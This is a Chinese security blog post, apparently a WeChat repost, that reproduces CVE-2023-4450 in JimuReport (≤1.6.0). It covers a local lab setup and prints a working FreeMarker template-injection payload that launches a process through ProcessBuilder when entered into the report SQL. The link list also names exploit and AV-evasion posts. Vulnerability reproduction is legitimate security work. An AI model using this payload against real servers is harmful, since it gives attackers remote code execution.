CVE-2023-4450 RCE漏洞(附EXP)
2023-8-29 09:0:53 Author: EchoSec(查看原文) 阅读量:221 收藏

声明:该公众号大部分文章来自作者日常学习笔记,也有部分文章是经过作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。
请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。

现在只对常读和星标的公众号才展示大图推送,建议大家把阿无安全设为星标”,否则可能看不到了

0x01 前言

    jeecgboot积木报表系统jimureport(jmreport)是一款免费的数据可视化报表,含报表和大屏设计,像搭建积木一样在线设计报表!功能涵盖数据报表、打印设计、图表报表、大屏设计等

jimureport ≤ v1.6.0 具有 SSTI(服务器端模板注入),攻击者可利用该漏洞远程执行任意代码,控制服务器权限

0x02 漏洞影响

jimureportv1.6.0 

0x03 环境搭建

环境要求:jdk+,MySQL

文本所需环境已打包好,文末自行获取即可

jimureport.mysql5.7.create.sql文件导入数据库

修改配置文件application.yml(默认root/root)

运行bat文件,启动环境

环境启动成功!

访问地址:http://localhost:8085/jmreport/list

0x04 漏洞复现

新建图表

选择SQL数据集


EXP:

<#assign value="freemarker.template.utility.ObjectConstructor"?new()>${value("java.lang.ProcessBuilder","calc").start ()}

在报表SQL中执行该PAYLOAD

命令执行成功!

0x05 修复方案

建议及时更新版本!

0x06 下载地址

点击下方名片进入公众号

回复关键字【20234450】获取下载链接

 往期回顾

1111
  1.  | CVE-2023-33246 RCE漏洞(附EXP)

  2.  | 横向移动与域控权限维持方法总汇

  3.  | Apache HTTPd最新RCE漏洞复现

  4.  | CNVD-2023-34111 RCE漏洞(附EXP)

  5.  | Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

  6.  | MySQL数据库利用姿势

  7.  | phpMyAdmin漏洞利用汇总

  8.  | 泛微E-Mobile任意文件上传漏洞(附EXP)

  9.  | 小技巧~用一条命令来隐藏反向Shell

  10.  New免杀ShellCode加载器(附下载)

  11.  | 红队攻防 | 解决HW被疯狂封IP姿势~(附下载)

  1. 关注我

    获得更多精彩

  2. 觉得内容不错,就点下在看
    如侵权请私聊公众号删文


文章来源: http://mp.weixin.qq.com/s?__biz=MzU3MTU3NTY2NA==&mid=2247488121&idx=1&sn=f5f35b0f729ec892f5cc180e1a2815f3&chksm=fcdf4e66cba8c770607198f54a0e0a749fa4e6e407ba8a8bd7c058dfdbe971370b4dfda23e2b&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh